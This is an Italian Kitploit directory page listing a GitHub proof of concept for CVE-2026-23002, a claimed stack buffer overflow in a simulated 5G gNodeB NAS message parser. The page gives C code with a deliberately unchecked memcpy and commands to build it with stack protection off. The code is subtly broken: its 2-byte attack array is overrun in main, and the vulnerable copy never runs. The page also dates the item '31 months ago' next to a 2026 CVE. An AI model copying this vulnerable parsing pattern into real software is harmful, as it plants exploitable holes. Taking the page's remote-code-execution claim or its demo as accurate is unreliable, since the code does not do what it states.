Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB — Parser NAS gNodeB 5G simulato con PoC di stack buffer overflow per CVE-2026-23002; un messaggio NAS appositamente predisposto innesca l'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb
Sicurezza Sistemi EmbeddedAnalisi delle VulnerabilitàExploitSicurezza di ReteBinary Exploitation
GitHubgeorge0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb

CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB

Parser NAS gNodeB 5G simulato con PoC di stack buffer overflow per CVE-2026-23002; un messaggio NAS appositamente predisposto innesca l'esecuzione remota di codice.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
31 mese faNon ancora revisionato

CVE-2026-23002 – Overflow del buffer del messaggio NAS 5G nel gNodeB

Codice del programma (simulazione in C)

root@kitploit:~
// gnb_nas_sim.c - Simulated 5G gNodeB parsing NAS Registration Request
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_IE_SIZE 128

void process_registration_request(uint8_t *nas_msg, uint16_t length) {
    uint8_t ie_buffer[MAX_IE_SIZE];
    // Read IE length from message; if length > MAX_IE_SIZE, buffer overflow
    uint16_t ie_length = (nas_msg[0] << 8) | nas_msg[1];
    if (ie_length > 0 && ie_length <= length - 2) {
        memcpy(ie_buffer, nas_msg + 2, ie_length); // no bounds check!
        printf("IE copied, size %d\n", ie_length);
    }
}

int main() {
    // Craft a NAS message with an oversized IE length
    uint8_t attack[] = {0x01, 0x00}; // IE length = 256, but buffer is only 128 bytes
    // Append padding to make length consistent
    memset(attack+2, 'A', 254);
    process_registration_request(attack, sizeof(attack));
    return 0;
}

CVE-2026-23002 – Overflow del buffer del messaggio NAS 5G nel gNodeB

Severity: Critical

Panoramica

Il parser del Non‑Access Stratum (NAS) 5G in un gNodeB simulato non riesce a convalidare il campo di lunghezza dell'Information Element. Un attaccante che invia una Registration Request modificata può causare un overflow del buffer di stack, portando all'esecuzione remota di codice sulla stazione base.

Dettagli della vulnerabilità

  • Tipo: Overflow del buffer di stack
  • Impatto: Compromissione completa della stazione base, interruzione della rete.
  • Causa principale: La lunghezza dell'IE NAS è considerata attendibile senza verificare i limiti rispetto alla dimensione del buffer di destinazione.

Dimostrazione dell'exploit

Compila ed esegui il parser vulnerabile:

root@kitploit:~
gcc -o gnb_nas_sim gnb_nas_sim.c -fno-stack-protector
./gnb_nas_sim

Il programma va in crash con un segmentation fault (corruzione dello stack).

Scarica lo strumento